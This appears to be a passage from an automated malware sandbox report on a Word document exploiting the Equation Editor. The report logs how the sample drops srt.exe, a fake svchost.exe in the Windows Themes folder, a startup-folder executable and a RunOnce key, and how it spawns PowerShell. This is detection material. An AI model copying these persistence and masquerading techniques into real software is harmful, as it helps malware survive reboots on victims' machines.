                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.3028.5597425ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000006.00000002.2100253520.00000000002C5000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbV source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdbB source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2328.5596582ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000004.00000002.2098522265.00000000006BB000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2102530848.0000000002A80000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: srt.exe.2.drStatic PE information: 0x8CF7700A [Sat Dec 10 23:45:14 2044 UTC]
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_003C26D5 push ss; retn 0006h3_2_003C26F0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02B209AC push 04418B05h; ret 4_2_02B209C3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02B20B30 push 08418B05h; ret 4_2_02B20B53
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_02B20950 push 04418B05h; ret 4_2_02B209C3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_028211A3 push 9BC2BDD8h; retn 569Bh6_2_02821202
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01EDA1A8 push 9B09C380h; ret 10_2_01EDA219
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 12_2_013726D5 push ss; retn 0006h12_2_013726F0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0289117C push 93CF84E6h; iretd 15_2_02891202
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_057109F1 push eax; retn 002Eh16_2_05710A09
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 20_2_003C26D5 push ss; retn 0006h20_2_003C26F0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_057109F1 push eax; retn 004Ch23_2_05710A09
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_057109A1 push eax; retn 004Ch23_2_05710A09
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_058100DA push eax; retf 005Ah32_2_058100F1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_058100F4 push eax; retf 005Ah32_2_058100F1
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeCode function: 38_2_000726D5 push ss; retn 0006h38_2_000726F0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 39_2_013726D5 push ss; retn 0006h39_2_013726F0

                      Persistence and Installation Behavior:

                      barindex
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeJump to dropped file
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\srt.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Drops PE files to the startup folderShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
